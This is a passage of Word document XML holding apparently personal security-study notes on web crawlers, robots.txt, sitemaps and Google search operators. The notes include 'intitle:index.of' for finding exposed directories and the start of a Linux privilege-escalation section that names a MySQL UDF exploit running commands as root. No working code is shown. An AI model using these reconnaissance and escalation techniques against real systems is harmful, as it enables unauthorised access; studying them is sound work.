    </w:p>
    <w:p w14:paraId="5288E546" w14:textId="6227A85E" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>information is processed and stored in dictionaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26730CAB" w14:textId="689DFE66" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>entries reevaluated and fine-tuned with continued crawling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10356F91" w14:textId="7FEF3941" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>attempt to traverse every URL and connection to build web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17746675" w14:textId="708BB6E6" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>decision on hierarchy of domain relevance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF47D2E" w14:textId="2CD2E60F" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Search Engine </w:t>
      </w:r>
      <w:r w:rsidR="007404FC" w:rsidRPr="0084205E">
        <w:t>Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368E746" w14:textId="2EFA0B5F" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>prioritizing domains as they are easier to index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993016B" w14:textId="2C8DFB38" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>website responsiveness to browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB6FF4" w14:textId="1FA90E95" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ease of which to crawl websites using sitemaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A133B6" w14:textId="02393169" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use of keywords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672940AA" w14:textId="43625D8B" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Google Site Analyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB6760" w14:textId="5AB5E31D" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Website/Server owners stipulate what content crawlers can scrape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6C2DA" w14:textId="78B8B72D" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>not everything should be scrapable by crawlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61583CFF" w14:textId="1A7A5A86" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>such as Admin pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF8A90" w14:textId="6BE1439D" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEBBBFF" w14:textId="4774F156" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B5A30" w14:textId="0FE0C3AA" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>the first thing indexed by crawlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF159E" w14:textId="2EE71E40" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>served at the root directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738041CE" w14:textId="6365FC73" w:rsidR="007404FC" w:rsidRPr="0084205E" w:rsidRDefault="007404FC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>specified by webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92A523" w14:textId="4D618F97" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>defines permissions crawler has to website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE6B99" w14:textId="677C3151" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">what files and directories crawler can and cannot </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>index</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="227CE77D" w14:textId="24A53FFB" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>user-agent – type of crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72944590" w14:textId="708E45CA" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allow – what can be indexed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C03413A" w14:textId="19670240" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>disallow – what cannot be indexed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C434F" w14:textId="04CB2EE0" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sitemap – reference to location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D1F130" w14:textId="54C0466A" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A26E6" w14:textId="1F379A2F" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>.conf – extension of Unix/Linux system config file that is often hid from Crawlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DBCB8D" w14:textId="3322B845" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>operates on blacklisting basis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5603F593" w14:textId="22E91B75" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="00141CD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sitemaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF2354" w14:textId="21EC2F95" w:rsidR="00141CD9" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>indicative resources helpful for crawlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA3520" w14:textId="07D79F79" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>specify necessary routes to find content on a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D8C37" w14:textId="47EBF93C" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">routes to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nested-content</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42C5497D" w14:textId="0929F1AF" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>actual pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311D27F" w14:textId="3270BBD9" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XML formatted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24EA0F" w14:textId="5A09927F" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using Google for Advanced Searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C45E994" w14:textId="29E34B33" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>quotation marks to use exact search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8B56D" w14:textId="636C55A4" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>site:&lt;website&gt; &lt;search query&gt; to refine search to a specific website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E6CB0" w14:textId="43F1B55C" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>filetype: - search for file by extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7622A" w14:textId="06C68C3C" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>site:bbc.co.uk</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>filetype:pdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DFC2CF7" w14:textId="3EB0844E" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cache: - view googles cached version of a specified URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D08944" w14:textId="09FE8449" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="008F38D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>intitle: - the specified phrase MUST appear in the title of the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042597A0" w14:textId="1A954781" w:rsidR="008F38D8" w:rsidRPr="0084205E" w:rsidRDefault="00566967" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>intitle:index</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BE4D476" w14:textId="68EB0EC8" w:rsidR="00566967" w:rsidRPr="0084205E" w:rsidRDefault="00566967" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>directory traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA30FD6" w14:textId="3C2C14BE" w:rsidR="00566967" w:rsidRPr="0084205E" w:rsidRDefault="00566967" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6647A9B6" w14:textId="72816A3A" w:rsidR="00566967" w:rsidRPr="0084205E" w:rsidRDefault="00711750" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – Continued</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C74176B" w14:textId="798875F7" w:rsidR="00711750" w:rsidRPr="0084205E" w:rsidRDefault="00F7228B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03226C49" w14:textId="0AE56812" w:rsidR="00F7228B" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MySQL exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via MySQL service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD63FA0" w14:textId="030E9927" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
